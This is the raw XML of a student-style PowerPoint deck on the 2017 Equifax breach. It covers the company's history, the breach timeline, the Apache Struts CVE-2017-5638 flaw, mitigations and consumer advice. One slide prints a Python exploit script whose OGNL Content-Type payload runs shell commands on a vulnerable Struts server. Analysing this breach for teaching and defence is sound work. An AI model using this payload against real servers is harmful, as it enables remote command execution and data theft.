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5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E5DA1E-2E65-422A-8AA1-0EDD1F887A6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63CEAC-CB1E-403E-982D-A2F03D20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F7EB-5144-4A75-84A4-C42B0453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142261"/>
            <a:ext cx="8676222" cy="3200400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0"/>
              <a:t>EQUIFAX INC.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RCE ATTACK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>MAY 2017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C6BC3-375A-436C-ADED-CCBCB753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058053"/>
            <a:ext cx="8676222" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BY JOSHUA GOULD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39823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BC1-21E6-4EC3-9103-6B0178B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062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/>
              <a:t>WHAT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2126-EFF0-47C9-922D-4258EBA7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70" y="1511423"/>
            <a:ext cx="10781298" cy="312420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a credit reporting agency </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>distributes information on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>800 million </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>individuals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along with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>88 million businesses worldwide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a: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FC32C2C-7871-46BF-AC58-9DC6BBC57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66" b="88966" l="2451" r="94935">
                        <a14:foregroundMark x1="6209" y1="25517" x2="6209" y2="25517"/>
                        <a14:foregroundMark x1="2614" y1="53103" x2="2614" y2="53103"/>
                        <a14:foregroundMark x1="27124" y1="60690" x2="27124" y2="60690"/>
                        <a14:foregroundMark x1="35458" y1="26897" x2="35458" y2="26897"/>
                        <a14:foregroundMark x1="53758" y1="28966" x2="53758" y2="28966"/>
                        <a14:foregroundMark x1="63725" y1="34483" x2="63725" y2="34483"/>
                        <a14:foregroundMark x1="91176" y1="38621" x2="91176" y2="38621"/>
                        <a14:foregroundMark x1="94935" y1="19310" x2="94935" y2="19310"/>
                        <a14:foregroundMark x1="94771" y1="66207" x2="94771" y2="66207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56" y="405505"/>
            <a:ext cx="582930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3C477-DFB1-456E-B9B9-7D7A8EE58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74" y1="89241" x2="44974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4093"/>
            <a:ext cx="2867487" cy="23971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03C8B3-5FDA-47F9-B0F8-C1269362E0B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2547891" y="4502458"/>
            <a:ext cx="1068465" cy="3358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B1F85D-28C4-4BAC-9CBA-812A382B8733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3932808" y="4197749"/>
            <a:ext cx="7750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 Credit Company; Equifax former name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Willing to sell to anyone which includes, “... facts, statistics, inaccuracies and rumors ... about virtually every phase of a person's life; his marital troubles, jobs, school history, childhood, sex life, and political activities." The company was also alleged to reward its employees for collecting negative information on consumers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306203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BC1-21E6-4EC3-9103-6B0178B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062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/>
              <a:t>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2126-EFF0-47C9-922D-4258EBA7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57" y="1592248"/>
            <a:ext cx="9905998" cy="4216893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>On September 7, 2017, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Equifax announced a cybercrime identity theft event \</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Though the attack was stated to have begun in mid-May, the breach was not observed until July 29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, according to the now former Equifax CEO Richard F. Smith and a following report by Equifax. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The known specific cause of the Equifax breach was a failure to install a well-publicized security patch to Apache Struts detailed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>seven months </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>prior to the breach. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for Rick Smith, Chairman and CEO of Equifax">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F963BA74-BEE3-4EE5-A957-9A0855D5AC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5" y="243210"/>
            <a:ext cx="2019300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77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BC1-21E6-4EC3-9103-6B0178B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33" y="94695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CVE-2017-5638 RCE ATTACK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2126-EFF0-47C9-922D-4258EBA7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33" y="1467036"/>
            <a:ext cx="9905998" cy="421689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published on March 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>an exploit allows remote command attackers to execute arbitrary commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Additionally, reports found that Equifax ran a customer portal in Argentina for which the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>username and password combination was "admin/admin"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492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6CB29-EB7F-4A05-BDE3-7FA77A92BE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174597" y="1586460"/>
            <a:ext cx="6918662" cy="39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/bin/python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-*- coding: utf-8 -*-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urllib2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httplib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exploit(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"%{(#_='multipart/form-data')."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ognl.OgnlContext@DEFAULT_MEMBER_ACCESS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"(#_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memberAccess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"(#_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memberAccess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"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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ognlUtil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container.getInstance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(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."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ognlUtil.getExcludedPackageNames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().clear())."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ognlUtil.getExcludedClasses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().clear())."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context.setMemberAccess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='%s')."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iswin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=(@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java.lang.System@getProperty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('os.name').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().contains('win')))."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iswin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?{'cmd.exe','/c',#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}:{'/bin/bash','-c',#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"(#p=new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java.lang.ProcessBuilder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p.redirectErrorStream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(true)).(#process=#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p.start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=(@org.apache.struts2.ServletActionContext@getResponse().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getOutputStream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"(@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org.apache.commons.io.IOUtils@copy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process.getInputStream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payload +=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"(#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ros.flush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())}"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D49012-8F54-4B46-9A6D-1F6B6696CC58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5891815" y="2767612"/>
            <a:ext cx="204185" cy="56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AFF189-28D8-44E8-9564-3BB2E79A19F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016320" y="2069766"/>
            <a:ext cx="5095780" cy="320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try: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headers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{'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}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request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urllib2.Request(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headers=headers)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page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urllib2.urlopen(request).read()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except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httplib.IncompleteRead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page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e.partial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print(page)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return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 ==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'__main__':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import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if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len(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!=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print("[*] struts2_S2-045.py &lt;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else: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print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')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print("[*]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%s\n"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exploit(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9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4D8EFF-22D3-40A5-8E6E-403132FC8D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10950603" y="1586460"/>
            <a:ext cx="226383" cy="624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45A22-8A72-49AE-9E81-72B65549CB25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9845336" y="1307501"/>
            <a:ext cx="193827" cy="762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E5AA00-72BE-4E1A-B563-8216144A7344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8771875" y="2959222"/>
            <a:ext cx="250056" cy="347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BC1-21E6-4EC3-9103-6B0178B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33" y="103573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/>
              <a:t>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2126-EFF0-47C9-922D-4258EBA7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42" y="1993037"/>
            <a:ext cx="5568518" cy="4417904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Upgrading the System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Vulnerability Scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Restrict System Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>S2-045, created on Mar 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, 2017 is the currently publicly available patch for such a system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>validating Content-type and checking suspicious variables.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203B3-2CCD-4310-A4AB-C39C3E97ABEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403760" y="447059"/>
            <a:ext cx="6096000" cy="63073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&lt;interceptors&gt;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&lt;interceptor-stack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defaultWithoutUpload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name="exception"/&gt;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name="alias"/&gt;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name="i18n"/&gt;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name="prepare"/&gt;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name="chain"/&gt;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scopedModelDriven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modelDriven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name="checkbox"/&gt;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name="datetime"/&gt;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name="multiselect"/&gt;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staticParams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actionMappingParams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conversionError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name="validation"&gt;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&lt;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excludeMethods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input,back,cancel,browse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&lt;/interceptor-ref&gt;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name="workflow"&gt;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&lt;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excludeMethods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input,back,cancel,browse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&lt;/interceptor-ref&gt;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&lt;interceptor-ref name="debugging"/&gt;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&lt;/interceptor-stack&gt;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&lt;/interceptors&gt;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&lt;default-interceptor-ref name="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defaultWithoutUpload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9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BC1-21E6-4EC3-9103-6B0178B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33" y="103573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/>
              <a:t>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2126-EFF0-47C9-922D-4258EBA7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33" y="1802167"/>
            <a:ext cx="9905998" cy="479394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effectLst/>
              </a:rPr>
              <a:t>Freeze Credit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Get a new name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Move to another place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Throw away your license</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Get a new credit card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Change your social security #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hope for the best</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314010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BC1-21E6-4EC3-9103-6B0178B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33" y="103573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/>
              <a:t>What now?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93692-04FC-425D-9915-F541B343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71" y="1796987"/>
            <a:ext cx="10914463" cy="471922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head of the Consumer Financial Protection Bureau, has decided to pull away from the said investigation. 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Equifax has said it is under investigation by every state attorney general and faces more than 240 class action lawsuits.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11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249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Times New Roman</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>EQUIFAX INC. RCE ATTACK MAY 2017</vt:lpstr>
      <vt:lpstr>WHAT IS</vt:lpstr>
      <vt:lpstr>THE ATTACK</vt:lpstr>
      <vt:lpstr>CVE-2017-5638 RCE ATTACK</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MITIGATIONS</vt:lpstr>
      <vt:lpstr>MITIGATIONS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EQUIFAX INC. RCE ATTACK September 7th, 2017</dc:title>
  <dc:creator>Joshua Gould</dc:creator>
  <cp:lastModifiedBy>Gould, Joshua Daniel</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-30T03:39:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-30T04:27:09Z</dcterms:modified>
</cp:coreProperties>
</file>